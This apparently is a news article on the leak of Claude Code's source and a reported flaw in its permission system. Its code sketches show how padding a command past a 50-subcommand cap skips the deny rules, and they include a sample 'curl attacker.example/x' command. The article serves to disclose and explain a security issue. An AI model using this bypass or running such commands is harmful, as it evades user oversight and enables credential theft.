Claude Code, Anthropic's AI coding agent, has come under scrutiny after a significant security flaw was uncovered shortly after its source code leaked. The incident has raised concerns about risks and vulnerabilities inherent in the AI system.
Details of the Claude Code Leak
On March 31, 2026, a debugging JavaScript sourcemap for Claude Code version 2.1.88 was accidentally published to npm by Anthropic. The oversight was quickly identified by researcher Chaofan Shou, who shared the discovery on social media, prompting widespread examination of the de-obfuscated code.
Efforts to reconstruct the code were led by Sigrid Jin, a student at the University of British Columbia, alongside Yeachan Heo. Their work resulted in the recreation and dissemination of Claude Code's source code, comprising 512,000 lines of TypeScript across 1,900 files. While the leak poses certain risks, it does not include sensitive elements such as model weights or customer data, according to Melissa Bischoping of Tanium.
Exploring the Security Vulnerability
Shortly after the source code leak, the Adversa AI Red Team uncovered a critical vulnerability in Claude Code itself. The tool, a TypeScript codebase of roughly half a million lines, lets developers manage tasks from the command line and includes a permissions system designed to regulate command execution through allow, deny, and ask rules.
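The general shape of such a permissions system can be sketched as follows. This is an illustrative model of allow/deny/ask rule evaluation, not Claude Code's actual implementation; the rule patterns and precedence order shown here are assumptions.

```typescript
// Hypothetical allow/deny/ask permission evaluator. Rule format and
// precedence (deny > allow > ask) are illustrative assumptions.
type Verdict = "allow" | "deny" | "ask";

interface Rule {
  pattern: RegExp; // matched against the command string
  verdict: Verdict;
}

function evaluate(command: string, rules: Rule[]): Verdict {
  // Deny rules take precedence, then allow; anything unmatched
  // falls through to prompting the user.
  for (const rule of rules.filter((r) => r.verdict === "deny")) {
    if (rule.pattern.test(command)) return "deny";
  }
  for (const rule of rules.filter((r) => r.verdict === "allow")) {
    if (rule.pattern.test(command)) return "allow";
  }
  return "ask";
}

const rules: Rule[] = [
  { pattern: /^rm /, verdict: "deny" },
  { pattern: /^git status/, verdict: "allow" },
];

console.log(evaluate("git status", rules)); // "allow"
console.log(evaluate("rm -rf /", rules)); // "deny"
console.log(evaluate("curl example.com", rules)); // "ask"
```

In a model like this, safety depends on every subcommand of a compound command actually reaching the rule evaluator, which is where the reported flaw comes in.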
However, the permission system can be bypassed, potentially allowing unauthorized actions. The vulnerability stems from a performance optimization: to prevent the UI from freezing, Anthropic capped command analysis at 50 subcommands. Commands exceeding that limit skip full rule evaluation and default to a generic 'ask' prompt, inadvertently allowing malicious instructions to slip past the security checks.
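The bypass described above can be illustrated with a minimal sketch. The cap value, the splitting logic, and the toy deny list are assumptions based on the public reports, not Anthropic's actual code:

```typescript
// Illustrative sketch of how a subcommand cap can void deny rules.
// MAX_SUBCOMMANDS, the "&&" splitting, and isDenied are assumptions.
const MAX_SUBCOMMANDS = 50;

function isDenied(sub: string): boolean {
  return /curl|rm /.test(sub); // toy deny list for illustration
}

function checkCompound(command: string): "deny" | "ask" {
  const subs = command.split("&&").map((s) => s.trim());
  if (subs.length > MAX_SUBCOMMANDS) {
    // Performance fallback: per-subcommand analysis is skipped
    // entirely, so the deny rules below are never consulted.
    return "ask";
  }
  return subs.some(isDenied) ? "deny" : "ask";
}

// Padding a malicious subcommand with 51 harmless ones pushes the
// compound command over the cap, so the deny check never fires.
const padded =
  Array(51).fill("true").join(" && ") + " && curl attacker.example/x";

console.log(checkCompound("curl attacker.example/x")); // "deny"
console.log(checkCompound(padded)); // "ask"
```

The key point is that the fallback prompt looks routine to the user, so a denied command that would have been blocked outright instead arrives as an ordinary approval request.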
Implications and Future Outlook
This vulnerability presents a significant risk: attackers could exploit it to embed harmful commands within a project's files, potentially leading to credential theft and supply chain compromises. Despite the safety layer in Claude's language model, the flaw in the permission system remains a critical concern.
Adversa AI warns that a sophisticated attacker could leverage this vulnerability to execute malicious payloads, bypassing security measures and posing a threat to cloud infrastructure and CI/CD pipelines. As the situation unfolds, stakeholders will need to address these vulnerabilities to safeguard against potential exploitation.
The discovery of this flaw underscores the importance of rigorous security practices in software development, particularly in AI-driven applications. As the tech community responds to this challenge, ongoing vigilance and improvements in security protocols will be crucial to prevent future breaches.
